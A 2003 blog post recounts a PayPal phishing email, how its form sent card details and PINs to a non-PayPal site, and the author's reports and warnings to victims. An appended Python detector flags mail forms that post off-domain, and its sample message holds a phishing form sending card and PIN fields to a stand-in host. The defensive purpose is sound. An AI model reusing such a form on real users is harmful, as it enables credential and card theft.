PayPal Email Scam
May. 21st, 2003 02:30 am
So, I checked my Hotmail account earlier to find an email, supposedly from PayPal, saying that they're checking for inactive accounts and defunct email addresses and asking me to give them my email account, password, credit card number, expiration date and ATM PIN number.
Smelling something suspicious, a quick look at the message source revealed that the information they were asking you to fill into a form in the email was being sent to a website that most definitely was not PayPal. Looking at that website I could access a text file that contained the details of a vast many people who were dumb enough to fill out their details.
I've emailed PayPal, the FCC, the website host and the abuse department of who we think is responsible for the scam, as well as spending a good while harvesting all the email addresses of the people who fell for it and submitted their details, warning them to contact their credit card company or bank as soon as possible to block their account.
Hopefully this will be stopped in its tracks ASAP and nobody loses money over this.
The lesson to learn here is to never ever hand over your credit card details in an email. Most reputable companies would never ask you to supply this information by something as insecure as email (consider email like a postcard, basically anyone can read it). And I don't know ANY company who would also need your ATM PIN number for anything, especially when it's a credit card transaction. Even your own bank would never ask you to give the PIN number.
Considering PreZ harvested 125 working emails from that file, submitted in maybe a 24-hour period, I'm surprised that so many people fell for this shit. Quite a few people filled in bogus email à la 'fuckyou@blowme.com' with personal info saying 'I'm reporting you' etc. though, so not everyone was so easily fooled. All the person that runs the site needs to do is have one of those credit card machines that will put information on a blank card, go to an ATM with the list in hand of PIN numbers and withdraw whatever the hell s/he wants, or shop online 'til his/her heart's content and rack up huge bills.
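The check described in the post, reading the message source to see where the embedded form actually submits, can be automated for mail triage. The following is an added example, not code from the original post; the sample message, the host `collector.example.net` and the function names are constructed for illustration.

```python
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message (not from the original post); collector.example.net is a placeholder.
SAMPLE = """From: "PayPal" <service@paypal.com>
Subject: Account verification
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body>
<form method="post" action="http://collector.example.net/save.cgi">
Card number: <input name="cc"> PIN: <input name="pin"></form>
<form action="https://www.paypal.com/cgi-bin/webscr"></form>
</body></html>
"""

class FormActionParser(HTMLParser):
    """Collects the action attribute of every <form> tag."""
    def __init__(self):
        super().__init__()
        self.actions = []
    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")

def host_matches(host, domain):
    """True only if host is the domain itself or a subdomain of it."""
    host = host.lower().rstrip(".")
    return bool(domain) and (host == domain or host.endswith("." + domain))

def suspicious_form_targets(raw_message):
    """Return form actions that post somewhere other than the claimed sender's domain."""
    msg = message_from_string(raw_message)
    sender_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        charset = part.get_content_charset() or "utf-8"
        html = part.get_payload(decode=True).decode(charset, errors="replace")
        parser = FormActionParser()
        parser.feed(html)
        findings += [a for a in parser.actions
                     if not host_matches(urlparse(a).hostname or "", sender_domain)]
    return findings

if __name__ == "__main__":
    print(suspicious_form_targets(SAMPLE))
```

The comparison is against the domain the message claims to come from, so a spoofed From header still exposes the mismatch; a form with no action at all is also reported.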